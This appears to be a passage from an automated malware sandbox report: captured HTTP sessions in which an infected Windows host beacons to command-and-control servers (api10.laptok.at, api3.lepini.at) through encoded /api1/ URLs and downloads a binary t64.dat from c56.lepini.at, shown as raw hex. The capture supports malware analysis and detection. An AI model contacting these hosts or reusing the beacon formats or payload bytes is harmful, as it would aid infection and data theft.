Nov 23, 2020 12:19:14.931489944 CET	595	IN	Data Raw: a2 61 d8 e6 47 91 ea 97 c8 50 b3 0b f0 66 14 17 f2 cb bf 10 6d cd e5 2e 10 0e 0c d1 74 5e ee 60 fd 73 14 22 57 b4 2e af 75 e4 e9 c9 ad 2b 4c 40 08 ef 2e fa 35 b4 3f ba 31 30 b2 66 23 c6 c3 6b 33 8b 08 83 c4 e0 bd 51 8a bd d9 c5 38 6a 80 cb 71 b9 Data Ascii: aGPfm.t^`s"W.u+L@.5?10f#k3Q8jqNY6c&_yPUR(Dq]\|JV1y>sS~{G`k_^,3'{84>HBDQ }{^<7q_1[X[8_%(f
Nov 23, 2020 12:19:14.931524992 CET	597	IN	Data Raw: 51 09 b4 26 f2 e3 46 eb b3 b5 97 3b 38 12 cd 7b 88 1b f4 b7 6f 36 5a f4 3b 50 9a e0 90 ed 7b e2 0a c2 f8 14 ab 19 bd 81 f1 a2 4b 54 97 3f 05 55 fa 70 cb 79 d9 7d d4 5e 5f 07 59 2f 29 11 43 e4 97 76 f5 13 59 fd 47 57 c5 b1 20 b4 4c 66 ef 91 17 a5 Data Ascii: Q&F;8{o6Z;P{KT?Upy}^_Y/)CvYGW Lfzst-"_>,A6`n5#gP[>!,n;D&\|Z3'(?_?Ew93E2\|TE<XN,eKdkRdrOt)?.
Nov 23, 2020 12:19:14.931535959 CET	598	IN	Data Raw: 0d 88 c0 80 6b 33 3b 6e d2 33 43 fe 1d a4 da f8 64 7e 8f 7a 0e 25 31 25 be d6 33 ba 12 54 29 40 03 1f ca 08 6b d4 d6 32 1a 53 4c 88 e2 dc 28 1d 3d e5 74 bd ef 73 e3 43 d0 06 1f 8e 48 bb 3a 6e cf 36 21 a4 15 e9 c0 8a 32 6f 3c 58 6f 90 df 98 02 33 Data Ascii: k3;n3Cd~z%1%3T)@k2SL(=tsCH:n6!2o<Xo3B"tkX[@y1L~l\?v[6Hb;4G0!Aljs6O/$Wd2V"}`7DEB}PQx88[7] [Q'RP
Nov 23, 2020 12:19:14.931549072 CET	599	IN	Data Raw: 92 a6 c1 cc 97 d7 12 1e f3 81 59 aa 86 86 64 e7 0b 68 e9 06 88 07 fb 29 a4 01 b5 68 b0 c7 6f a2 02 f2 56 bc e1 d0 bc ee aa 52 31 21 45 54 ce 8a c3 02 15 47 df 9a eb b2 ba f8 51 15 68 b1 ea eb 70 7a 2c f7 18 4a fd ba 8e b9 2c 0d f6 79 fa 2f 8b 06 Data Ascii: Ydh)hoVR1!ETGQhpz,J,y/_uV/IUfn/WH/(Le)u+&ZI\KvHG`#=m4]\|J/44.?1#BzO_R@7YkN'LoP<OGf
Nov 23, 2020 12:19:15.154159069 CET	602	IN	Data Raw: 3b 9a f9 71 7e 7e fe 17 e9 04 1b b9 c2 fc 51 77 b5 2e 28 61 b4 44 ca 40 be 57 c3 ae 1b 2c b4 6f 1a 90 81 86 14 76 a1 07 74 eb 75 28 94 be 94 91 ae a5 48 ab 18 93 0b 9d f0 98 60 27 ac 96 1e 57 2b ee 25 e2 26 87 bc 20 40 b5 40 b1 1e a3 b9 93 c4 c0 Data Ascii: ;q~~Qw.(aD@W,ovtu(H`'W+%& @@k^ d@Qk/#p%sYET>Pp;BC4u^\{c{PFn34E4L?d.S;Jj6F*>&%e/;WK

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49737	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:19:16.872996092 CET	877	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 12:19:17.668709993 CET	883	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 23 Nov 2020 11:19:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49744	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:19:19.114414930 CET	898	OUT	GET /api1/KuF_2F7v1MfxGX_2FqHF/gE7HR_2BEW_2FETIZlo/3O7oOiSknl3ZdKUC6RNt6Z/TpA_2BZA44zII/bnPVc30i/qqGquE5ikDsN3lqsmRQUi6s/01UAcvdPS6/Y4vwKTH4z9SKX83Hk/GzPOGAYN_2Ba/uwZA847uRup/qUVRcsxtj_2B4M/Zg0BM4mqEN49EAfvZiK8m/hblONlnAdbx7_2FY/dksXSYXlnNujYzz/8J_2BxPtB78im5D1oF/b4ehtOJuT/4O2ZohnCHbAXcsKJP56g/k9_0A_0DMSUG1trlbpE/x9OMnUuruu3aGaoqe55RFv/8pmbW_2FjbM3S/_2FlfQQC/a7gxCYKdIB_2BmP/Gfdfp HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 12:19:20.069576025 CET	913	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:19:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 35 b2 e4 50 10 04 0f 34 86 98 8c 35 c4 ac 27 26 4f cc 34 a2 91 4e bf ff 02 1d 51 d1 59 59 db 9c df 94 0d da 16 5c 51 df f7 60 91 29 98 08 a1 fa 95 b6 73 81 48 5f b3 07 f9 ac 79 2e ec 6c 5b 49 6e 82 38 ae 4f 67 af 4b 83 54 b6 9a 19 3e ac e8 bb c3 d1 1b 3b d9 29 6c 76 1a 2b 74 5a e1 2e 51 78 2b ac e6 dc b0 31 88 bc 06 2f 99 c1 d7 50 96 c6 22 af ff fc a1 8c 6b 21 3d 2b 71 cb 41 5b bd a2 3e fb 65 9d f4 a8 01 19 9a 70 bd 6c 9a 17 c7 8b ce d9 36 4b 76 8f a8 e2 50 1f 6e 55 8b fb a5 97 e2 39 96 2d cf 72 1b c2 ca 41 3d 82 95 34 27 ff e2 b5 6c c3 8b f6 08 78 c6 a1 fd db a7 b2 f6 bb f9 2d 6c 6a 38 5d 49 0f 5b ce 54 1b 07 61 6b f5 2f c6 c3 ac a1 b9 9b ae 35 6f 67 d0 a8 c4 4d 9c 53 09 86 62 08 c5 eb b3 20 68 80 62 d2 fb 80 23 d2 11 99 5b 81 5b 4f e1 88 a6 88 d7 ed 87 5a 16 02 bb 8e 06 45 09 2d fe 09 52 88 b6 52 45 5c 95 a7 c6 82 e1 d1 7a 85 57 f7 ae d5 3f 2b 67 43 9a 95 0a 05 3a 74 dd 97 86 ef a5 88 a7 4f b5 09 a7 cc ca e4 16 54 d9 60 32 cb de 2f 9f 01 51 b1 d8 ec a4 a6 1f 5c 4b 9e c6 59 35 c2 4b fd c7 e6 50 b2 ec fa 07 ea 0c a5 e5 c2 8f 4e 76 ba 40 d7 ab cd 47 4a 9b e3 15 67 09 16 98 61 5c c7 5f 63 b7 38 f5 e7 5e 90 b7 99 b8 e8 c5 d5 e0 1b 66 bc 6a 87 20 9e e2 1b 66 cd ec d5 db 70 a8 5d 68 ee e7 96 d1 5b c2 6a 60 4b f5 e6 d3 f0 30 44 02 09 4d e8 f3 5c 3d 36 12 0a af 68 54 b7 26 44 2a 00 c8 35 6c e4 c6 8f 66 96 b3 4a 05 65 34 d1 b7 28 a0 bb 5c e2 b1 93 3c 0a c1 f8 64 9b af 72 b6 28 f9 4d 46 ab 9f 33 a1 f9 9e 7f 28 79 41 de 64 c5 db 94 7a 70 a0 91 c2 69 ab d1 13 b6 07 59 4c 35 0c 59 c2 6e 9c 01 c6 30 28 79 62 ac dc 67 6f f6 8e 77 b8 1c 9a b5 ab 6f 51 18 76 d9 a1 4c c0 e8 e8 7c 70 be 8b 31 a2 ba ed e4 a2 d2 b1 33 29 3a 3f cc 2c 6d 4f e7 a5 86 e9 b1 2d 39 27 92 38 f2 11 15 0d 0f db e5 ea 96 ba 4b a8 a0 2b 63 89 a2 e8 d2 cc 42 d4 29 e0 d5 c0 2a 87 a4 a1 c7 35 f0 85 ea ad 17 84 83 58 5f 02 27 90 07 87 aa cc 3a e9 a4 98 14 7c ee 51 cc 6e 6c d3 18 b4 9b a3 3d b4 b8 bc 26 52 b5 4d e2 5e f8 cd 6d 1f 08 1f 0e c2 4e c8 0f 65 58 71 47 e5 70 ce 27 dd b6 ef 14 2f 32 7f 31 33 cd ab 9f 11 e3 2f 67 f3 82 33 63 61 3b 25 f8 f9 76 ee c2 f3 9d 25 ed ba bf 5b b9 1d c3 f1 91 c6 c1 f7 5b 8d 63 ca ea ef 9a ca 4a e9 2b c8 33 f6 1b b5 b3 33 91 6e a7 a2 87 4c 2b 14 9a d2 2c e0 51 b8 65 d2 6e fd 76 32 15 a0 6d 51 e7 3b e8 3a c7 99 f3 f9 09 fe 7e 9f 2c 6d 31 5f fc 1d 98 ac 15 a4 92 aa ea 3b 94 b6 3f bc c7 3c 15 ee f2 6b 7b 1d f6 79 4b 61 56 de a4 ee 94 e0 03 f2 a7 05 29 ef 2a d1 88 5a 04 a0 aa 51 3b c0 4b f9 ab 29 8e 77 99 11 72 1a 3a be 97 1c 10 b3 cb 9c 27 58 d0 3d 33 08 94 6a a2 8e 36 38 66 26 5d 0f 6a cc 50 04 c3 02 e9 41 2e f2 56 ee c9 83 c9 87 33 81 e5 a0 bf f2 6f fc 7d be c4 c9 21 9d 8c 19 50 a4 8d bd 47 a0 89 d2 8f ab af 94 cc 01 c1 78 79 39 53 f5 5b a8 0b 88 16 22 7d 10 21 ad e8 d6 87 51 16 dd f1 e4 8f 79 03 42 40 9e bb 85 c8 4f 80 81 0b b1 ff 2b 18 91 67 9b 72 ca a3 96 df b8 34 3e cd 01 13 c8 92 0a 93 7e 15 c2 c0 84 0a 83 cd 3a 31 6d d9 aa a7 27 7b 39 cf 05 12 c2 86 0b 0a 9d 6b 68 40 28 4f e8 c3 41 93 8e 81 4b 15 3b c3 9b 25 bb 8a b9 d1 0c a1 c5 ca 15 88 17 0e cf a5 35 d6 db 15 51 ce e3 9d 5e 1c 85 25 d7 6e 92 8e cc d4 0e dc 43 18 d5 Data Ascii: 73f5P45'&O4NQYY\Q`)sH_y.l[In8OgKT>;)lv+tZ.Qx+1/P"k!=+qA[>epl6KvPnU9-rA=4'lx-lj8]I[Tak/5ogMSb hb#[[OZE-RRE\zW?+gC:tOT`2/Q\KY5KPNv@GJga\_c8^fj fp]h[j`K0DM\=6hT&D5lfJe4(\<dr(MF3(yAdzpiYL5Yn0(ybgowoQvL\|p13):?,mO-9'8K+cB)5X_':\|Qnl=&RM^mNeXqGp'/213/g3ca;%v%[[cJ+33nL+,Qenv2mQ;:~,m1_;?<k{yKaV)*ZQ;K)wr:'X=3j68f&]jPA.V3o}!PGxy9S["}!QyB@O+gr4>~:1m'{9kh@(OAK;%5Q^%nC
Nov 23, 2020 12:19:20.069654942 CET	914	IN	Data Raw: bb 94 df f4 0f 14 72 39 7e 83 fa e6 c5 b5 82 7e ba f3 18 95 8b 02 4b d0 3c e2 c6 4b a0 21 6b 5d 5a 04 89 23 56 3a 77 2f e5 63 81 1a e5 7d 15 32 d2 c6 1e 35 62 05 42 8f 2e bb 76 5e 7c 72 e6 a2 94 d7 f7 ed 70 5d a9 7e 7a bf 0b 2b f1 97 85 fa 23 35 Data Ascii: r9~~K<K!k]Z#V:w/c}25bB.v^\|rp]~z+#5:'~/-?. s=Vtrd6}\0cD(~qm`Po=UZEO7BZo;C[]S.Lo.}1Q.8xJfS?{Pz@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49765	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:20:00.069071054 CET	5675	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Nov 23, 2020 12:20:00.715794086 CET	5677	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:20:00 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
Nov 23, 2020 12:20:00.715840101 CET	5678	IN	Data Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8 Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8\|ymf&ASxYE6*Vfy
Nov 23, 2020 12:20:00.715887070 CET	5679	IN	Data Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1 Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)\|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
Nov 23, 2020 12:20:00.715995073 CET	5681	IN	Data Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23 Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
Nov 23, 2020 12:20:00.716034889 CET	5682	IN	Data Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4 Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
Nov 23, 2020 12:20:00.716072083 CET	5683	IN	Data Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63 Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP\|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
Nov 23, 2020 12:20:00.716110945 CET	5685	IN	Data Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1 Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
Nov 23, 2020 12:20:00.716208935 CET	5686	IN	Data Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77 Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
Nov 23, 2020 12:20:00.716249943 CET	5688	IN	Data Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed Data Ascii: ^P_L1l`>up_`O`RC'2%[Tj0#@J\|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
Nov 23, 2020 12:20:00.716286898 CET	5689	IN	Data Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59 Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv\|&g6wHLTk?N~d>,<AHkPyhv?R
Nov 23, 2020 12:20:00.989725113 CET	5691	IN	Data Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41 Data Ascii: hG&\|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm\|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49766	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:20:13.752633095 CET	5823	OUT	GET /api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Host: api3.lepini.at
Nov 23, 2020 12:20:14.988385916 CET	5832	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:20:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49768	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:20:15.327480078 CET	5833	OUT	POST /api1/v3jshWKSZC/krn1p7RrW8z3GbGc_/2FFaZK_2BekT/0OtUsmpYx6p/WfQzt4S0Zn457c/1i9HHJRZikaIvJ_2F4Ld0/npT_2Bob9NwfipWw/nUig82mch1FFwH2/1AhxrjhRqExAflhNHx/Cb9luck68/wJ0bPw_2BlEIUsEBoTa7/b3vKAY1TUvvWyKMIerF/bnMrh0BhKsVoIInhXNlnvd/gshefiHtEYuWl/JyEMRLpF/nO3AiIuXH9ihbmxg5VrB2D_/2B1gectVzg/fTJ8Ip_0A_0DE7j3s/GvjWVtZw3Zx0/xpwKnQogZJC/sFRvTTh1zHV/2QqrR8_2B/H HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Content-Length: 2 Host: api3.lepini.at
Nov 23, 2020 12:20:15.330399990 CET	5833	OUT	Data Raw: 0d 0a Data Ascii:
